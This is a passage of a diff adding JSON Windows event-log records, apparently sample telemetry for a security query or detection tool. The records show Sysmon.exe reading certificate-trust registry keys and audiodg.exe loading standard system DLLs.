"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976050000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883573976210000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883573976210000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "AudioSes.dll", + "image_path": "C:\\Windows\\System32\\AudioSes.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "avrt.dll", + "image_path": "C:\\Windows\\System32\\avrt.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976360000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 